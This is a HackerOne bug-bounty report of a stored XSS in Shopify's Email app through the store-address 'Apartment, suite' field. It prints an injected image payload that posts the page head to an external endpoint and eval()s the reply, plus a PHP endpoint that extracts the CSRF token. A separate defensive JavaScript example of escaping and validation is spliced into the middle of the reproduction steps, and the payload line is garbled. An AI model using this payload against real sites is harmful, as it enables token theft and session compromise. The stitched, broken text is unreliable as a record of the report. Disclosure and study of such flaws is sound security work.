Shopify: XSS within Shopify Email App - Admin

ID H1:869831
Type hackerone
Reporter francisbeaudoin
Modified 2020-09-14T19:56:53


The Shopify Email Application is vulnerable to XSS

A user with only Settings access can inject HTML into the "Apartment, suite, etc. (optional)" field of the Store address section; that HTML is then rendered unescaped in the Shopify Email template editor.

Steps to reproduce

  1. Open Settings page
  2. Insert malicious HTML within the "Apartment, suite, etc. (optional)" field. Please note that the inserted code is a bit more complex than it needs to be; I was just trying to find out whether it was possible to "bypass" the 255-character limit, which it is. (Code snippet can be found below.) ██████
  3. Install Shopify Email App
  4. Select a template that displays Apartment, suite, etc. (optional) field {F822194}
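As an added defensive example (not Shopify's code and not part of the report), the JavaScript below shows the two server-side controls that close this class of issue: enforce the 255-character limit on the server rather than only through a client-side attribute, and HTML-encode the field value at the point where it is interpolated into the email template. A small detection helper flags stored values that look like markup so they can be logged. The field names, the `{{placeholder}}` template syntax and the trimmed payload are constructed assumptions for the demonstration.

```javascript
// Added example, not Shopify's code: defensive handling of a free-text
// address line before it is interpolated into an HTML email template.
// Assumptions: the field limit is 255 characters (as stated in the report);
// the template uses {{name}} placeholders (constructed for this example).

const ADDRESS_LINE_MAX = 255;

// Output encoding for HTML element content and double-quoted attribute values.
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#39;', '`': '&#96;',
  };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Server-side validation: reject over-length input instead of trusting a
// client-side maxlength attribute, which the report shows can be bypassed.
function validateAddressLine(value) {
  if (typeof value !== 'string') {
    return { ok: false, reason: 'not a string' };
  }
  // Count code points rather than UTF-16 units so multibyte text is not miscounted.
  const length = Array.from(value).length;
  if (length > ADDRESS_LINE_MAX) {
    return { ok: false, reason: `exceeds ${ADDRESS_LINE_MAX} characters` };
  }
  return { ok: true, value };
}

// Detection helper for logging/alerting: flags stored values that look like
// markup (tags, inline event handlers, javascript: URLs). This is a signal
// for monitoring, not a sanitiser; output encoding remains the control.
function looksLikeMarkup(value) {
  return /<\s*[a-z!/]|\bon\w+\s*=|javascript:/i.test(String(value));
}

// Render the template, encoding every interpolated field. Unknown
// placeholders render as empty strings rather than leaking raw input.
function renderEmailTemplate(template, fields) {
  return template.replace(/\{\{\s*(\w+)\s*\}\}/g, (_, name) =>
    Object.prototype.hasOwnProperty.call(fields, name) ? escapeHtml(fields[name]) : '');
}

// Constructed sample input: same shape as the report's payload (an event
// handler on a broken image), trimmed to a harmless alert.
const CONSTRUCTED_PAYLOAD = '<img src="a:" onerror="alert(1)"/>';
const TEMPLATE = '<p>{{address1}}<br>{{address2}}</p>';

function demo() {
  const check = validateAddressLine(CONSTRUCTED_PAYLOAD);
  const html = renderEmailTemplate(TEMPLATE, {
    address1: '1 Main St',
    address2: CONSTRUCTED_PAYLOAD,
  });
  return { check, flagged: looksLikeMarkup(CONSTRUCTED_PAYLOAD), html };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The payload passes the length check (it is short), so length enforcement alone would not have stopped it; what neutralises it is that `renderEmailTemplate` encodes the value, so the `<img>` tag and its `onerror` handler arrive in the editor as literal text. The `looksLikeMarkup` signal is there to surface such values in logs for review.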

JavaScript code used

```html
<img src="a:" onerror="var t=setTimeout;t(function(){var b=function(d){var x=new XMLHttpRequest;t(function(){eval(x.responseText)},2000);'POST','');x.send(d)};window.parent.postMessage(b(document.head.innerHTML),'*');},2000)"/>
```

PHP code used by the endpoint called from the XMLHttpRequest

```php
<?php
// Handles the POST sent by the injected script: parses the posted document
// <head>, reads the csrf-token <meta> tag, and returns JavaScript that
// alerts the token (the injected script eval()s the response).
header("Access-Control-Allow-Origin: *");

$html = file_get_contents('php://input');

$doc = new DOMDocument();
$doc->loadHTML($html);
$xpath = new DOMXPath($doc);
$query = "//meta[@name='csrf-token']";
$entries = $xpath->query($query);

$csrf = "";
foreach ($entries as $entry) {
    $csrf = $entry->getAttribute('content');
    break;
}

$request = "alert('CSRF Token: " . $csrf . "');";

echo $request;
```


An attacker could at least trigger requests to the endpoint.